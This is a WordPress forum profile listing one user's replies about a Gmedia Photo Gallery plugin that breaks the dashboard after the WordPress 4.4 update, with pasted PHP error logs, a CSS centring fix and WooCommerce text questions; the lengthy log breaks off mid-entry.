dinonik
Forum Replies Created
-
Forum: Plugins
In reply to: [WooCommerce] Recent ProductsYes Mike
in the meantime I resolve with Poeditor.thx
Forum: Plugins
In reply to: [WooCommerce] Change text "items" in menuI suppose you didn’t understand me, in menu line (theme Wootique) menu are on left and on right is written “0 items – 0.00$”, that’s what I want to change this text “items” to let say “My orders”.
I try with Poedit to change and I find text “%d items” but when I change noting happened.
Can you tell me where in code I can manually change.Forum: Plugins
In reply to: [Gmedia Photo Gallery] WP 4.4 compatibility@rattus
maybe you should look what’s are difference between this two version and there try to find problem. After I configure version 1.7.1 and check that all work just fine I try to make upgrade and I get the same error like before. So, from my point of view must be something with new version compatibility. Now I have again 1.7.1 version and all work fine on last version of WP.
Maybe this can help you to seek for problem.Forum: Plugins
In reply to: [Gmedia Photo Gallery] WP 4.4 compatibilityI resolve problem, now old version 1.7.1 work just fine for me I add
Custom CSS Advanced Setting:
.minima_module object {
display: block;
margin-left: auto;
margin-right: auto;
}and now picture is in center.
Forum: Plugins
In reply to: [Gmedia Photo Gallery] WP 4.4 compatibility@rattus
I return old version 1.7.1 and now work all just fine for me (I change manually plugin version in “grand-media.php” to last version to avoid info about new version until I resolve this problem. Just one question (I forget how I done fist time) since I resize gallery on about 60% now is on left side I didn’t find way how to center. I add my css in Custom CSS Advanced Setting: margin: 0 auto; but no effect. Any tips how to center my gallery.Forum: Plugins
In reply to: [Gmedia Photo Gallery] WP 4.4 compatibilityerror log file
============
[18-Dec-2015 10:02:57] PHP Warning: require_once(/home/site/public_html/wp-content/plugins/grand-media/inc/core.php) [function.require-once]: failed to open stream: No such file or directory in /home/ site /public_html/wp-content/plugins/grand-media/grand-media.php on line 70
[18-Dec-2015 10:02:57] PHP Fatal error: require_once() [function.require]: Failed opening required ‘/home/ site /public_html/wp-content/plugins/grand-media/inc/core.php’ (include_path=’.:/usr/lib/php:/usr/local/lib/php’) in /home/ site /public_html/wp-content/plugins/grand-media/grand-media.php on line 70Forum: Plugins
In reply to: [Gmedia Photo Gallery] WP 4.4 compatibilityI must repeat that before last update of your plugin and WP 4.4 your plugin work just fine with all other plugins that I have. So, is it something with your plugin or with WP upgrade or compatibility ….
Forum: Plugins
In reply to: [Gmedia Photo Gallery] WP 4.4 compatibilityI try all that you mention in previous post, I even clear DB of Gnedia table from previous install before I make clean install. Also turn off other plugin, but always the same problem as soon I copy Gmedia folder manually in Plugins or try to make install through WP BLANK.
I don’t see my Dashboard any more. Then I erase your folder then is everything back as before.
I really don’t know what to do anymore.Forum: Plugins
In reply to: [Gmedia Photo Gallery] WP 4.4 compatibility@rattus
I just try all what you wrote, no use.
I even change theme, turn-off all plugins again nothing.
Like I mention few times as soon I activate your plugin I don’t see my dashboard, blank page all white. Then I through Cpanel delete your plugin and all work normally.
Any tipsForum: Plugins
In reply to: [Gmedia Photo Gallery] WP 4.4 compatibilityI done all that you write, and this is result. I must underline that error is the same, as soon I activate plugin I don’t have wordpress dash board blank page, then I delete plugin manually and then I can see dash board. Hire is error log, and part of code in function.php file line 3619
====================================
[17-Dec-2015 10:23:19] PHP Notice: The called constructor method for WP_Widget is deprecated since version 4.3.0! Use__construct()
instead. in /home/site/public_html/wp-includes/functions.php on line 3619
[17-Dec-2015 10:23:19] PHP Notice: The called constructor method for WP_Widget is deprecated since version 4.3.0! Use__construct()
instead. in /home/site/public_html/wp-includes/functions.php on line 3619
[17-Dec-2015 10:23:41] PHP Notice: The called constructor method for WP_Widget is deprecated since version 4.3.0! Use__construct()
instead. in /home/site/public_html/wp-includes/functions.php on line 3619
[17-Dec-2015 10:23:41] PHP Notice: The called constructor method for WP_Widget is deprecated since version 4.3.0! Use__construct()
instead. in /home/site/public_html/wp-includes/functions.php on line 3619
[17-Dec-2015 10:28:47] PHP Notice: The called constructor method for WP_Widget is deprecated since version 4.3.0! Use__construct()
instead. in /home/site/public_html/wp-includes/functions.php on line 3619
/**
* Filter whether to trigger an error for deprecated functions.
*
*WP_DEBUGmust be true in addition to the filter evaluating to true.
*
* @since 4.3.0
*
* @param bool $trigger Whether to trigger the error for deprecated functions. Default true.
*/
if ( WP_DEBUG && apply_filters( ‘deprecated_constructor_trigger_error’, true ) ) {
if ( function_exists( ‘__’ ) ) {
trigger_error( sprintf( __( ‘The called constructor method for %1$s is deprecated since version %2$s! Use %3$s instead.’ ), $class, $version, ‘__construct()
‘ ) );
} else {
trigger_error( sprintf( ‘The called constructor method for %1$s is deprecated since version %2$s! Use %3$s instead.’, $class, $version, ‘__construct()
‘ ) );
}
}Forum: Plugins
In reply to: [Gmedia Photo Gallery] WP 4.4 compatibility@rattus
I have version that has work OK, and on each info about last new version I make upgrade. On last upgrade (last version) I get this error.
All I can do clean error log file try once more and then send you a fresh log file, but I’m positive that what you mention is problem.Also other person have the same problem.Forum: Plugins
In reply to: [Gmedia Photo Gallery] WP 4.4 compatibilityHere is error log file
===================================[18-Mar-2015 23:08:30] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1443) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 940 [18-Mar-2015 23:08:30] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1443) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 941 [18-Mar-2015 23:08:30] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1443) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 942 [18-Mar-2015 23:08:30] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1443) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 943 [18-Mar-2015 23:08:30] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1443) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 944 [18-Mar-2015 23:08:30] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1443) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 945 [18-Mar-2015 23:08:30] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1443) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 948 [18-Mar-2015 23:08:30] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1443) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 949 [18-Mar-2015 23:08:30] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1443) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 950 [18-Mar-2015 23:08:30] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1443) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 951 [18-Mar-2015 23:08:30] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1443) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 954 [18-Mar-2015 23:08:30] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1443) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 955 [18-Mar-2015 23:08:30] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1443) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 956 [18-Mar-2015 23:08:30] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1443) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 957 [22-Mar-2015 04:52:51] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1443) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 940 [22-Mar-2015 04:52:51] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1443) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 941 [22-Mar-2015 04:52:51] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1443) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 942 [22-Mar-2015 04:52:51] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1443) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 943 [22-Mar-2015 04:52:51] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1443) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 944 [22-Mar-2015 04:52:51] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1443) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 945 [22-Mar-2015 04:52:51] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1443) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 948 [22-Mar-2015 04:52:51] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1443) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 949 [22-Mar-2015 04:52:51] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1443) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 950 [22-Mar-2015 04:52:51] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1443) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 951 [22-Mar-2015 04:52:51] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1443) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 954 [22-Mar-2015 04:52:51] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1443) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 955 [22-Mar-2015 04:52:51] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1443) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 956 [22-Mar-2015 04:52:51] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1443) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 957 [02-Apr-2015 20:44:34] PHP Warning: parse_url(/http://www.http://magento.com/) [<a href='function.parse-url'>function.parse-url</a>]: Unable to parse URL in /home/dnwebmak/public_html/wp-content/plugins/better-wp-security/modules/free/hide-backend/class-itsec-hide-backend.php on line 165 [02-Apr-2015 20:45:28] PHP Warning: parse_url(/http://www.http://wordpress.org/) [<a href='function.parse-url'>function.parse-url</a>]: Unable to parse URL in /home/dnwebmak/public_html/wp-content/plugins/better-wp-security/modules/free/hide-backend/class-itsec-hide-backend.php on line 165 [02-Apr-2015 20:45:39] PHP Warning: parse_url(/http:/www.http:/wordpress.org/) [<a href='function.parse-url'>function.parse-url</a>]: Unable to parse URL in /home/dnwebmak/public_html/wp-content/plugins/better-wp-security/modules/free/hide-backend/class-itsec-hide-backend.php on line 165 [18-Apr-2015 17:25:54] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 940 [18-Apr-2015 17:25:54] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 941 [18-Apr-2015 17:25:54] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 942 [18-Apr-2015 17:25:54] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 943 [18-Apr-2015 17:25:54] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 944 [18-Apr-2015 17:25:54] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 945 [18-Apr-2015 17:25:54] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 948 [18-Apr-2015 17:25:54] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 949 [18-Apr-2015 17:25:54] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 950 [18-Apr-2015 17:25:54] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 951 [18-Apr-2015 17:25:54] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 954 [18-Apr-2015 17:25:54] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 955 [18-Apr-2015 17:25:54] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 956 [18-Apr-2015 17:25:54] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 957 [26-Apr-2015 02:44:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 947 [26-Apr-2015 02:44:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 948 [26-Apr-2015 02:44:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 949 [26-Apr-2015 02:44:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 950 [26-Apr-2015 02:44:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 951 [26-Apr-2015 02:44:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 952 [26-Apr-2015 02:44:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 955 [26-Apr-2015 02:44:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 956 [26-Apr-2015 02:44:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 957 [26-Apr-2015 02:44:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 958 [26-Apr-2015 02:44:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 961 [26-Apr-2015 02:44:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 962 [26-Apr-2015 02:44:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 963 [26-Apr-2015 02:44:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 964 [26-Apr-2015 06:41:14] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 947 [26-Apr-2015 06:41:14] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 948 [26-Apr-2015 06:41:14] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 949 [26-Apr-2015 06:41:14] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 950 [26-Apr-2015 06:41:14] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 951 [26-Apr-2015 06:41:14] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 952 [26-Apr-2015 06:41:14] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 955 [26-Apr-2015 06:41:14] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 956 [26-Apr-2015 06:41:14] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 957 [26-Apr-2015 06:41:14] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 958 [26-Apr-2015 06:41:14] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 961 [26-Apr-2015 06:41:14] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 962 [26-Apr-2015 06:41:14] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 963 [26-Apr-2015 06:41:14] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 964 [29-Apr-2015 19:50:42] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 947 [29-Apr-2015 19:50:42] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 948 [29-Apr-2015 19:50:42] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 949 [29-Apr-2015 19:50:42] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 950 [29-Apr-2015 19:50:42] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 951 [29-Apr-2015 19:50:42] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 952 [29-Apr-2015 19:50:42] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 955 [29-Apr-2015 19:50:42] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 956 [29-Apr-2015 19:50:42] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 957 [29-Apr-2015 19:50:42] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 958 [29-Apr-2015 19:50:42] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 961 [29-Apr-2015 19:50:42] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 962 [29-Apr-2015 19:50:42] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 963 [29-Apr-2015 19:50:42] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 964 [07-May-2015 06:50:15] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 947 [07-May-2015 06:50:15] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 948 [07-May-2015 06:50:15] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 949 [07-May-2015 06:50:15] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 950 [07-May-2015 06:50:15] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 951 [07-May-2015 06:50:15] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 952 [07-May-2015 06:50:15] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 955 [07-May-2015 06:50:15] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 956 [07-May-2015 06:50:15] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 957 [07-May-2015 06:50:15] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 958 [07-May-2015 06:50:15] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 961 [07-May-2015 06:50:15] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 962 [07-May-2015 06:50:15] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 963 [07-May-2015 06:50:15] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 964 [10-May-2015 09:32:11] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 947 [10-May-2015 09:32:11] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 948 [10-May-2015 09:32:11] PHP Warning: Cannot modify header information - headers already sent by (output started at 